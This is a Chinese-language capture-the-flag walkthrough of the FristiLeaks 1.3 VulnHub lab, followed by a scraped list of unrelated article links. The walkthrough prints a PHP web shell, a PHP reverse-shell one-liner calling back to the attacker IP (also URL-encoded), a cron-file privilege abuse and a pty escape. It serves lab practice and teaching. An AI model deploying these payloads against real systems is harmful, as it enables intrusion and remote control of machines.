FristiLeaks_1.3#攻略
一、环境搭建
下载地址:FristiLeaks: 1.3 ~ VulnHub
1、这个靶机的网卡配置有点问题,我有更改root密码,更改了部分配置文件,使其可以在NAT模式下获取IP地址:
echo '' /etc/udev/rules.d/70-persistent-net.rules;删除了/etc/sysconfig/network-scripts/ifcfg-eth0的MAC和UUID行;service network restartreboot
2、kali攻击机的IP地址:10.10.10.131,网卡选择NAT模式;
二、情报收集
nmap -sP 10.10.10.0/24
nmap -sV -p1-65535 10.10.10.152
1、获取信息如下:
2、访问80端口(看看这骚气的紫蓝色)
3、目录扫描
多个工具尝试,获得robots.txt,but都是静态页面,无有效信息;
4、完了不会做了,看攻略
5、攻略说,隐藏目录在首页出现的单词中:'keep'、'calm'、'and'、'drink'、'fristi';
看到它在嘲笑我:http://10.10.10.152/fristi/
6、sql注入、万能密码无效;查看源码获得线索;
源码中提示:
1) by eezeepz;
2) 网页中的图片经过了base64加密,但是有两段base64编码,图片只有一张;
图片1:data:img/png;base64,/9j/4AAQSkZJRgABAgAAZ......
图片2:iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAA......
- 复制编码到文件,图片1的头部“data:img/png;base64,”需要剔除;
echo "图片编码字符" > info
base64 -d info > info.png
对编码文件解码,并重定向到info.png
7、尝试登陆:user: eezeepz passwd: keKkeKKeKKeKkEkkEk; 获取上传页面;
8、写码上传,此处存在解析漏洞,xxx.php.jpg文件会被系统以php解析,这边就不展示burp上传文件了,直接写码上传;
echo '<?php system($_GET[a]);phpinfo();?>' > listena.php.jpg
# 此处踩坑,必须用单引号哦~
9、上传之后反弹shell;
1)攻击机监听6666端口;
2)传递反弹shell给$a;
php -r '$sock=fsockopen("10.10.10.131",6666);exec("/bin/sh -i <&3 >&3 2>&3");'
# 给$a传递参数的时候记得URL-Encode;--------------------------------------------------------
url?a=%70%68%70%20%2d%72%20%27%24%73%6f%63%6b%3d%66%73%6f%63%6b%6f%70%65%6e%28%22%31%30%2e%31%30%2e%31%30%2e%31%33%31%22%2c%36%36%36%36%29%3b%65%78%65%63%28%22%2f%62%69%6e%2f%73%68%20%2d%69%20%3c%26%33%20%3e%26%33%20%32%3e%26%33%22%29%3b%27
3)监听成功;
三、渗透测试
1、系统版本信息&版本漏洞查询;
1)利用文件上传漏洞,上传9479.c.jpg到靶机;
在/tmp目录编译运行报错:操作不被允许;
2、遍历网站目录
1)发现/var/www/notes.txt文件,指向了eezeepz用户的家目录,内容如下:
2)发现/home/eezeepz/notes.txt文件,内容如下:
- 能访问/usr/bin/*;
- 部分/usr/bin/下没得的命令,在/home/admin,该目录只有admin用户有权限;
- /tmp/runthis文件,每分钟运行一次;
3)更改/home/admin目录权限;
echo '/home/admin/chmod 777 /home/admin' > /tmp/runthis
4)After a minute,/home/admin权限更改成功,获得两个加密文件,一个加密方式,根据cryptpass.py反向解密,结果如图所示;
5)尝试登陆fristigod;
- “Error:must be a tty”执行如下命令,调用tty接口;
python -c 'import pty;pty.spawn("/bin/bash")'
6)发现/home/fristigod/.secret_admin_stuff/doCom,可执行的二进制文件;
执行history发现作者以fristi的身份执行了ls命令,猜测可以执行高权限的命令,比如:su - 直接执行./doCom su -,提示wrong user;
至此,靶机get✔。
四、其它尝试
1)验证密码“thisisalsopw123”属于admin用户;
2)linux kernel 2.6.32-573在dirtyCow脏牛提权漏洞的范围内,但是无法在靶机进行编译;
当系统内核版本低于下图所示,dirtyCow都会对齐影响:
编译报错:
FristiLeaks_1.3#攻略相关推荐
- VIM配置攻略(最强干货加强版)
自己最近也在折腾这个VIM的配置,在网上也看了很多教程等,说真的看的一头雾水.主要是对于一个初学者来说对Vundle等根本没有什么了解,也不知道怎么用,并且由于本人的Linux系统是CentOs6.5 ...
- 基于DCMTK的DICOM相关程序编写攻略
2008年09月10日 星期三 15:35 基于DCMTK的DICOM相关程序编写攻略 前言: 由于现在的医学影像设备的图像存储和传输正在逐渐向DICOM标准靠拢,在我们进行医学图像处理的过程中,经常 ...
- http状态404 vscode_VS Code 调试完全攻略(5):基于浏览器的 React 应用
每日前端夜话第344篇 翻译:疯狂的技术宅 作者:Charles Szilagyi 来源:charlesagile 正文共:1750 字 预计阅读时间:7 分钟 这次我们来研究怎样把调试器连接到用 C ...
- Java - 框架之 SpringBoot 攻略day01
Spring-Boot 攻略 day01 spring-boot 一. 基本配置加运行 1. 导入配置文件(pom.xml 文件中) <parent> <groupId>org ...
- AWS攻略——使用CodeBuild进行自动化构建和部署Lambda(Python)
Aws Lambda是Amazon推出的"无服务架构"服务.我们只需要简单的上传代码,做些简单的配置,便可以使用.而且它是按运行时间收费,这对于低频访问的服务来说很划算.具体的介绍 ...
- AWS攻略——使用CodeBuild进行自动化构建和部署静态网页
首先声明下,使用"CodeBuild"部署并不是"正统"的方案,因为AWS提供了"CodeDeploy".如果不希望引入太多基础设施,可以考 ...
- 小黑盒不显示服务器,steam上买的游戏小黑盒不显示 | 手游网游页游攻略大全
发布时间:2018-04-18 贪吃蛇遇上打方块是一款最近非常热门的休闲小游戏,游戏将贪吃蛇和打方块合而为一吸引了很多玩家!但是好多小伙们都不知道该怎么玩,下面小编来教你一个快速入门的小技巧吧!~ 小 ...
- 一般熟练盲打需要多久_进口攻略!一般货物进口清关需要多久?如何有效提高清关效率?...
***请点击上方红色的"关注"我们,您的关注,是我们努力的动力!谢谢!*** 一.清关是什么意思? 在回答"清关一般要多久之前"我们一起来看下,就是清关是什么意 ...
- 64位游戏找call_《使命召唤16:战区》配置注册登录全攻略,三步让你极迅游戏!...
如果说谁是2020年最火的游戏,那么<使命召唤16:战区>绝对是排名第一.自从<使命召唤16:战区>发布之后,同时在线人数就不断刷新纪录,一天300万,3天800万 ,到现在已 ...
最新文章
- 大连理工计算机专业导师,大连理工大学计算机科学与技术学院研究生导师简介-申彦明...
- 域名缓存侦测(DNS Cache Snooping)技术
- Vuejs——组件——slot内容分发
- 实验 5 性能测试脚本录制和开发实验报告--软件功能测试与性能测试实验
- Django之ORM对数据库操作
- EM算法【图像迭代】
- 【我的物联网成长记14】车路协同,不只是车和路
- SQL Server2000的安装
- 2.2 获取图像感兴趣区域_几何变换图像裁剪
- 三大角度 PK ,Go 语言和 Node.js 谁胜谁负?
- 标签树状结构JSP中树状图的代码实现
- Javascript中的执行环境及作用域
- java 区间api_Java 常用API(一)
- 项目升级到Delphi 2010总结
- 【在esp32的3D打印机主板上配置marlin固件OLED】
- the Disadvantages of an Elite Education
- 听过闰年闰月,可你听过闰秒吗?
- 微软面试题之数字谜题方案
- 计算机与昆虫关系的论文,趣味昆虫学论文 昆虫与人类的关系
- iphone原彩显示对眼睛好吗_iPhone12又拉胯?用户吐槽屏幕发黄,到底是为啥?
热门文章
- fatal: unable to access ‘xxx‘: schannel: failed to receive handshake, SSL/TLS connection f...
- cobaltstrike域前置
- APISpace 笑话大全API
- 2021-2022下沉市场研究报告合集(共46份)
- 从《虎嗅》改版说说小作坊如何做产品和项目管理
- 转载:为什么Linux不需要磁盘碎片整理
- 扇贝python编程课_扇贝编程APP下载|扇贝编程python V1.1.35 安卓版下载 - 下载银行...
- 实体店运营:能提高顾客留存率的店铺陈列方式
- OpenPCDet 训练自己的数据集详细教程!
- python统计英文文章中单词出现的次数